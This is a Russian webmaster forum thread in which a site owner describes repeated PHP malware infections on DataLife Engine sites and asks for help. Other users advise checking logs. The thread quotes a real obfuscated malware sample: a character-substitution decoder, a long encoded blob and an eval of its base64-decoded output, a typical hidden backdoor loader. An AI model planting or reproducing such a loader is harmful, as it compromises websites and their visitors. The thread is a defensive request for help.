- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всем привет.
Прошу вашей помощи, так как уже не знаю что делать.
Дело в том, что на моих сайтах начали появляться вирусы, я заметил их еще в январе месяце когда делал резервную копию через фтп, каспер начал грешить что на сайтах вирус "Trojan.PHP.Agent.pg" я начал копаться по сайтам и нашел кучу файлов с вредностным кодом, этих файлов ранее не было - я сверялся с приведущими бэкапами. Месяц назад я очистил свои сайты и забыл о них, но вчера снова делал резервную копию и снова пришлось удалять кучу вирусов и разных файлов с непонятным мне кодом - которых раньше не было.
Вчера я удалил по фтп все папки сайтов и восстановил сайты с помощью резервной копии на которой не было вирусов, так же поменял пароли от фтп, базы мускл, сервера. Сегодня утром я решил снова произвести проверку и снова обнаружил вирусы на одном из сайтах. Я пошел дальше и сделал проверку с помощью айболита, он сканировал мне весь сервер и обнаружил пару файлов на сайтах которых я не находил - я их сразу же удалил, вот только на момент сканирования на одном из сайтах был вирус именнуемым касперским как "Trojan.PHP.Agent.pg" - айболит его не обнаружил.
Вот парочка примеров вредностного кода, который я обнаружил на своих сайтах:
$ymfkisa = 8084; function svylpumccs($ytnahg, $adphvliemx){$pzymecsxi = ''; for($i=0; $i < strlen($ytnahg); $i++){$pzymecsxi .= isset($adphvliemx[$ytnahg[$i]]) ? $adphvliemx[$ytnahg[$i]] : $ytnahg[$i];}$vhpuy="base" . "64_decode";return $vhpuy($pzymecsxi);}
$jkgvbsst = 'lU6I5PMAjhkEWvHwq5nkWJFCWkGajvWJ05MrHgitqYaI5PMAjhkEWvHwq5'.
'najvnEfLFmjZF9Fm4ot5P2lUADOR1ALZIkn5oJjRKsLvHsfRIpnckCjkGwORpkFm4ot5P2lUADfLFmjZFEWhH4jZFwOR'.
'1JqlDAr4wqU3IknKGwORpkLviAjRkwqlDAr4wqlU6I5hkhq5KPfRfAjhH'.
'Pq5FU8KMEVgGtbTPAlUA2lU6ob5DofcHhOR1kq5FU8KMEVgGtbT4obkiNbTP2lUAGlU6I5hkhq5KPfRfA'.
'jhHPq5Fz8HFKUpVygkkEgwHUUHFMHzG8bTPAlUA2lU6ob5DofcHhOR1kq5Fz8HFKUpVygkkEgwHUUHF'.
'MHzG8bT4obTeTqYaI5JwI5owqORSoq5KPfRfAjhHPq5nMYKFKUgVfLpFHYkeiI'.
'lVQrlnQfQSmtvF7rlF7SRfAIQ7mORKTtYf7nckCtYoJq8PI5JaI5TDob5MPfRfAjhg6FwKtgPHMVKkEgkHrL9zwIctsIvIhIQb'.
'9ShzsthK7fhPvr3FASRbiIhKwOReir5WablzAr4wqlU6ob5DoFcV7nczoy8MrHgitr4wqb5Dob5VPSLV7LvB'.
'ku8DGbz1HYz42lU6I5TDob5DPVwiyUPKtgpaJSZIESLHwO5nnblwoF9UpSYIkflfh0RtsrYPBIlnhr5wsIRtw0RSvfcUsthbs'.
'IvVkt8W2lU6ob5DofviCShKab5VQWpG7nLV6r4wqlU6I5TDob5MAfTD6bRfpjhIwORGNLvHsOLIwWmoJfhk'.
'afHG4nLVESvGNncHNn3tJq8PI5TDob5M2lU6ob5Dob5DobcfpjhIwORGNbcfAjcHEW'.
'3HwLvICjJVkjJV9q5VN05DPf54oFcfaSRWoy8McSRi9f8PI5TDob5Dob5Dou4wqb5Dob5Dob5Dob5DoFcpCfc'.
'goy8DPfhi7fmDGy8DsbleoFvzJbl6oFZWJr4wqb5Dob5Dob5Dob5DoFcS'.
'oy8MDfhG4fRs6Fcsab5VBjvVkqYaI5TDob5Dob5Dob5Dobckhb5oPfTDGyYwoVhKaWvgAlU6ob5Dob5Dob5Dob5M2lU6ob5'.
'Dob5Dob5Dob5Dob5DoWhHwnLFNblD2lU6ob5Dob5Dob5Dob5MGlU6ob5Dob5Dob5Dob5Mkj3IklU6ob5'.
'Dob5Dob5Dob5M2lU6ob5Dob5Dob5Dob5Dob5DoORSoqck9LvKmWhK1q5VPq8PoFcUoy8MAjLMajvV'.
'kq5VPqYaI5TDob5Dob5Dob5Dob5Dob5DPSJkwfLIEnZFAn3VkjTDGbcfZWhkwf8oPfT4oFcUAr4wqb5D'.
'ob5Dob5Dob5Dob5DobcfQjcG9f8oPfTP2lU6ob5Dob5Dob5Dob5Dob5DoWhHwnLFNb5VTuLVkWpGZ'.
'WhkwncHNr4wqb5Dob5Dob5Dob5DoEUwqb5Dob5Dob5MGlU6ob5DoE'.
'UwqlU6ob5DoORSoq5KhnR1QnckCjkGkuck9n3t6FvfAjcHEfvHwLvICjJVkjJV9FmPAlU6ob5Dou4w'.
'qb5Dob5Dob5MhnR1QnckCjTMhORikLvnknKGQjv1wfR1wWmoPfhkafR17jRgAlU6ob5Dob5Dob3aI5TDob5Do'.
'b5Dob5Dob5VhOcKNfcikblwofhG4fRs6FcfAjcHNSRpk05DTWTbAr4wqb5Do'.
'b5Dob5Dob5DoFcfQjv1wfR1wWmDGbcfmfRKPq5VhOcKNfcik05MhORikWvkdf8oPfhkafR17jRgAqYaI5T'.
'Dob5Dob5Dob5DobcfQjcG9f8oPfh77jhVaf8P2lU6I5TDob5Dob5Dob5Dob3Fkn3HmjTDPfhICjJVkjJV9r4wqb5Do'.
'b5Dob5MGlU6ob5DoEUwqb5DobcfpjhIwORGNbcI9LvnknKGQnLFmfR1wLvfAjcH4SLV6q5'.
'PI5TDob5M2lU6ob5Dob5Dob3Fkn3HmjTMwWhkBq3MmfRnEWhH4jcKQf'.
'8oT0p460TAWF5eT05DJFm4oLpGc8giKLpeAqYaI5TDob5MGlU6I5T'.
'Dob5MhnR1QnckCjTMQWpGPfRImuLMwLZM6SLIkq5VPSLV705DPOvH1qUwqb5Dob3aI5TDob5Dob5DoFcGpnKGPSLV7blwobTb2lU'.
'6I5TDob5Dob5DofhGmb5oPOYw4rmDPOYi9n3FafRs6FcV7nczAr'.
'mPI5TDob5Dob5Dou4wqb5Dob5Dob5Dob5DofhGmb5oPOQw4rmDPOQi9n3FafRs6FcBku8PoFTSoFcPeWZV'.
'mjcHNq5VPSLV7qYaoFc6Xqm4oFcPXqmPI5TDob5Dob5Dob5Dob3aI5TD'.
'ob5Dob5Dob5Dob5Dob5DPjZHwLvV7nczo0QwoSv7mqcGmf5oPfcKwSHaPOHwAbKsojZFPq5VXfLkjFcAnq8P2lU6ob5'.
'Dob5Dob5Dob5MGlU6ob5Dob5Dob3wI5owqb5Dob5Dob5MmfLVpWhsoFcGpnKGPSLV7r4wqb5Dob3wI5ow'.
'qb5DobcfpjhIwORGNbcI9LvVkSZF1W3U6FcV7nczab5VXfLPAlU6ob5Do'.
'u4wqb5Dob5Dob5MJjcGTSR4oFcI9LvKpnco2lU6I5TDob5Dob5DoWhHwnLF'.
'NbcI9LvVkSZF1W3VEWc77Wvg6SZIEfcHQWJk4nKG4OcK9f8oPfcKwS84oFcBku8Pab5VQWpG7nLV6qYa'.
'I5TDob5MGlU6ob5DofJHNSZVAjvsoSZIEfR1QWJk4n5oPfcKwS84oFcBku8PI5T'.
'Dob5M2lU6ob5Dob5DobcnajvF7j5DPSZIESLHwOlaI5owqb5Dob5D'.
'ob5MmfLVpWhsoSZIEfcHQWJk4nKG4OcK9f87QWpGPfRImuLMwLZM6SLIkq5VPSLV705'.
'DPSZIESLHwO5Pab5VXfLPAr4wqb5Dob3wI5owqb5DobcfpjhIwOR'.
'GNbcI9LvnknKG4j3HJOR1ESvGNfhkJq5PI5TDob5M2lU6ob5Dob5Dob5V9fRihLvICjJVkjJUoy8MDfhkafHGJfLVE'.
'SvGNncHNn3t6SZIEfvHwLvIpWJFkjJVEfhkafLM7nco6q8P2lU6I5TDob5Dob5DoFcIC'.
'jhfAfpG4jZtoy8M9n3F4jZt6F3IkjcfESvGNncHNn54ojRUpqcI9Lvnkn'.
'KGQnLFmfR1wLvfAjcH4SLV6q5PAqYaI5TDob5Dob5DoORSoq5VQjv1hORnEW'.
'cG9b5zGy8McUgiYV8PI5TDob5Dob5Dou4wqb5Dob5Dob5Dob5DoFcICjhfAfmDGb3IpSJIwWToPWvH'.
'afkGQjv1wfR1w05DPSvGNfhkJLZMCWmDXbltmqYaI5TDob5Dob5Dob5Dob5V4j3HJOR19blwoU3HNWvHmORKaOLAkq'.
'cI9LvVkSZF1W3U6ShK9fYSwLvVkSvGPf8oPSvGNfhkJq84ojRUpqcI'.
'9LvnknKGQnLFmfR1wLvfAjcH4SLV6q5PAq8P2lU6ob5Dob5Dob3wI5TDob5Dob5DofRi9fUwqb5Dob5Dob5M2lU6ob5'.
'Dob5Dob5Dob5DPWcipfvkNWmDGbzKmWhK1q5P2lU6ob5Dob5Dob3wI5owqb5Dob5Dob5MmfLVpW'.
'hsoF3ManRnAjJt2lU6ob5DoEUwqlU6ob5DofJHNSZVAjvsoSZIEWvHwLZManRnAjkGQjv1hORW6F3ManRnAjJtAlU6ob'.
'5Dou4wqb5Dob5Dob5DPSvGNfhkJLvHNSmDGbcF7WvgvIKGkjhICfcg6SZIEfR1QWJk4n57DWvHmORKa'.
'OLAkq5V4j3HJOR19q84ojRUpqcI9LvnknKGQnLFmfR1wLvfAjcH4SLV6q5PAq8P2lU6ob5Dob'.
'5Dob5V9fRihLvICjJVkjJUoy8MDfhkafHGJfLVESvGNncHNn3t6'.
'SZIEfvHwLvIpWJFkjJVEfhkafLM7nco6q8P2lU6I5TDob5Dob5DoFcICjhfAfpG4jZtoy8M9n3F4jZt6F'.
'3IkjcfESvGNncHNn54ojRUpqcI9LvnknKGQnLFmfR1wLvfAjcH4SLV6q5PAqYaI5TDob5Dob5DoORSoq5VQjv1hORnEWcG9b5zG'.
'y8McUgiYV8PI5TDob5Dob5Dou4wqb5Dob5Dob5Dob5DoFcICjhfAfpGCjcUoy8M9nRF9n3b6F3Ik'.
'jcfESvGNncHNn54oFcICjhfAfpG4jZtoqmD9tTP2lU6ob5Dob5Dob5Dob5DPWvHafkGQj'.
'v1wfR1wblwoWZVmLZFkWci7Svg6FcICjhfAfpGCjcUab5VQjv1hORnEfR1Q05DPWvHafkGQjv1wfR1wqYaI5owqb5Dob5Dob'.
'5MGlU6ob5Dob5DobcHaWvgI5TDob5Dob5Dou4wqb5Dob5Dob5Dob5DoF3IkjcfESvGNncHNn5DGb5V9fRihLvICjJVkjJUo0TD'.
'TLc1WjTeCbTDNbcpPI87QWpGJfLVESZHmWhHNnKGhORikWcKwO5oAq8DNb5VQjv1hORnEfR1Qr4wqb5Dob5Dob5M'.
'GlU6I5TDob5Dob5DoUcfAjcHEW3HwLvICjJVkjJV9qcI9LvnknKGQnLFmf'.
'R1wLvfAjcH4SLV6q5Pab5V9fRihLvICjJVkjJUAr4wqb5Dob3wI'.
'5owqb5DobcfpjhIwORGNbcI9LZManRnAjkG7fcU6Fc17jRgab5VTSLIkIQVEfcKwS8PI5TDob5M2lU6ob5Dob5Dob'.
'5V4j3HJOR19blwoSZIEfvHwLZManRnAjkGQjv1hORW6qYaI5owqb5Dob5Dob5D'.
'PWcipfvkNWpaPjhKBfHwoy8MTSLIkIQVEfcHQjvVkq5VTSLIkIQVEfcKwS8P2lU6I5TDob5Dob5DoSZIEWv'.
'HwLZManRnAjkGQjv1hORW6F3ManRnAjJtAr4wqb5Dob3wI5owqb5DobcfpjhIwORGNbcI9LZManR'.
'nAjkGmfRw6Fc17jRgAlU6ob5Dou4wqb5Dob5Dob5DPWcipfvkN'.
'WmDGbcI9LvnknKG4j3HJOR1ESvGNfhkJq5P2lU6I5TDob5Dob5DonR19fLU6F3ManRnAjJIjFc17jRHnqYaI5owqb5Dob5Dob5'.
'MQWpG9fLVEWcipfvkNLvICjhfAfmoPWcipfvkNWmP2lU6ob5DoEUwqlU6ob5DofJHNSZVAjvsoSZIEWcipfvkNLviCSRU'.
'6Fc17jRgGYkHtY5PI5TDob5M2lU6ob5Dob5DobcfCWhH7SvooqcI9LvnknKG4j3HJOR1ESvGNfhkJq5PoSLtoF3MNSRpkyYsPWcI'.
'CjJVkjJUAlU6ob5Dob5Dob3aI5TDob5Dob5Dob5Dobckhb5oPjhKBf8PI5TDob5Dob5Dob5Dob3a'.
'I5TDob5Dob5Dob5Dob5Dob5MAfTD6WZVmSvp4q5VNSRpk05DPWc17jRgAblwGblD'.
'AlU6ob5Dob5Dob5Dob5Dob5Dou4wqb5Dob5Dob5Dob5Dob5Dob5Dob5MknhKaq5V4SvGNncHNn5P2lU6ob5Dob5Dob'.
'5Dob5Dob5Dob5DobcFmfRKXr4wqb5Dob5Dob5Dob5Dob5Dob3wI5TDob5'.
'Dob5Dob5Dob3wI5TDob5Dob5Dob5DobcHaWvgI5TDob5Dob5Dob5Dob3aI5TDob5Dob5Dob'.
'5Dob5Dob5MknhKaq5V4SvGNncHNn5P2lU6ob5Dob5Dob5Dob5MG'.
'lU6ob5Dob5Dob3wI5TDob5MGlU6I5TDob5MhjZFkSRI6b5oPLwIy'.
'YwBFV8M7WmDPOvH1yYsPnhKanRgAlU6ob5Dou4wqb5Dob5Dob5'.
'DPfcKwS8DGb5VvSRipfYaI5TDob5Dob5DoFcV7ncKEOvH1blwoFcBkuYaI5TDob5MGlU6I5TDob5MAfTD6b8VPSLV7q'.
'Uwqb5Dob3aI5TDob5Dob5DofhGmfRKQO5D6FKGUYpIgbcK9b5VXfLPGyT'.
'VvSRipf8PI5TDob5Dob5Dou4wqb5Dob5Dob5Dob5DoFcV7nczoy8DPnhKanRg2lU6ob5Dob5Dob5Dob5DPfcKwSHGXfLPoy8DPOv'.
'H1r4wqb5Dob5Dob5MGlU6ob5DoEUwqlU6ob5DoFcV7nczoy8MDnR19fLFASRiAuhg6SZIEfcHQWJk4n57TS'.
'LIkIQVEfcHQjvVkq5VPSLV7q84oFcV7ncKEOvH1q8P2lU6I5TDob5MAfTD6OLI9fLU6FcV7ncKjFvKXFpwAb5Shb5'.
'VQWpG7nLV6yYwPfcKwSHaJSRaJL8PI5TDob5M2lU6ob5Dob5Dobckhb5oPfcK'.
'wSHaJS8nnblwGb5nAFmPI5TDob5Dob5Dou4wqb5Dob5Dob5Dob5DoFcPoy8MMWJF7u8oI5TDob5Dob5Dob'.
'5Dob5Dob5DJW3SJblw+bzM4O3MvfLF9ORGNq5PalU6ob5Dob5Dob5Dob5Dob5DoFZIvFmDGy'.
'TDJtTs40YzJ0Dwqb5Dob5Dob5Dob5Dob5Dob5n7OmWoyYsoFcV7ncKjFvKXFpwalU6ob5Dob5Dob5Dob5DA'.
'r4wqb5Dob5Dob5Dob5DofRI6jmMDWvHmORKaOLAkq5VAqYaI5TDob5Dob5Dob5DobcHsOLU2lU6ob5Dob5Dob3wI5TDob5Dob5D'.
'ofRi9fRkhb5oPfcKwSHaJS8nnblwGb5nkFmPI5TDob5Dob5Dou4wqb5Dob5Dob5Dob5Dof'.
'Lf7j5oPfcKwSHaJf5nnqYaI5TDob5Dob5DoEUwqb5Dob5Dob5Mkj3IkORSoq5V'.
'PSLV7Rmn7FpwoyYwoFZManRnAjTWAlU6ob5Dob5Dob3aI5TDob5Dob5'.
'Dob5Dobckhq5VPSLV7Rmn9S8nnblwGb5n7fcUJqUwqb5Dob5Dob5Dob5Dou4wqb5Dob5Dob5Dob5Dob5DobcI9LZManRn'.
'AjkG7fcU6FcV7ncKjFZDJL84oFcV7ncKjFvUJL8P2lU6ob5Dob5Dob5Dob5MGlU6o'.
'b5Dob5Dob5Dob5Mkj3IkORS6FcV7ncKjFZI7FpwoyYwoFZFkj8WAlU6ob5Dob5Dob5Dob5M2lU6'.
'ob5Dob5Dob5Dob5Dob5DoSZIEWcipfvkNLZFkj8oPfcKwSHaJW5nnqYaI5TDob5Dob5Dob5Dob3wI5TDob5Dob5DoEUwqb5Dob'.
'5Dob5MkSv7Cb5VPSLV7Rmn7Omnnr4wqb5Dob5Dob5Mkuckwq5P2lU6ob5DoEUwqlU6ob5DoSZIEWcipfvkNLviCSR'.
'U6qYaI5Jw=';
$xvcgeiae = Array('1'=>'5', '0'=>'L', '3'=>'H', '2'=>'7', '5'=>'C', '4'=>'w', '7'=>'h', '6'=>'o', '9'=>'z', '8'=>'S', 'A'=>'p', 'C'=>'v', 'B'=>'t', 'E'=>'f', 'D'=>'A', 'G'=>'9', 'F'=>'J', 'I'=>'N', 'H'=>'V', 'K'=>'F', 'J'=>'n', 'M'=>'B', 'L'=>'X', 'O'=>'a', 'N'=>'u', 'Q'=>'j', 'P'=>'k', 'S'=>'Y', 'R'=>'W', 'U'=>'Q', 'T'=>'i', 'W'=>'c', 'V'=>'R', 'Y'=>'T', 'X'=>'r', 'Z'=>'3', 'a'=>'s', 'c'=>'G', 'b'=>'I', 'e'=>'8', 'd'=>'6', 'g'=>'U', 'f'=>'Z', 'i'=>'x', 'h'=>'m', 'k'=>'l', 'j'=>'b', 'm'=>'y', 'l'=>'D', 'o'=>'g', 'n'=>'d', 'q'=>'K', 'p'=>'1', 's'=>'4', 'r'=>'O', 'u'=>'e', 't'=>'M', 'w'=>'0', 'v'=>'2', 'y'=>'P', 'x'=>'q', 'z'=>'E');
eval/sve/(svylpumccs($jkgvbsst, $xvcgeiae));
}
Буду рад любой помощи.
А что у Вас за CMS?
Сервер или хостинг?
А что у Вас за CMS?
Сервер или хостинг?
Версия DataLife Engine: 10.5, на одном из сайтах 9.8. Еще фотохостинг есть, но там не знаю как посмотреть...
Сервер
Как говорицца, ищите и обрящете. Всё найти и удалить. Сайт xxx-klubniki.net - Ваш?
Как говорицца, ищите и обрящете. Всё найти и удалить. Сайт xxx-klubniki.net - Ваш?
Да мой, в том то и дело, что все по удалял уже, а они все ползут...
Логи изучайте. Чего-то не заметили значит.
Логи изучайте. Чего-то не заметили значит.
Знать бы только что там искать...
Вот нашел тот вирус в логах, что только это значит хз
😂😂😂
Это мой IP. И означает это то, что я проверил, удалили ли Вы этот файл.
еще вот такие письма регулярно приходят на почту, отправка идет с моего сайта, словно кто-то через обратную связь шлет
😂😂😂
Это мой IP. И означает это то, что я проверил, удалили ли Вы этот файл.
ахах)) да я удалил его...)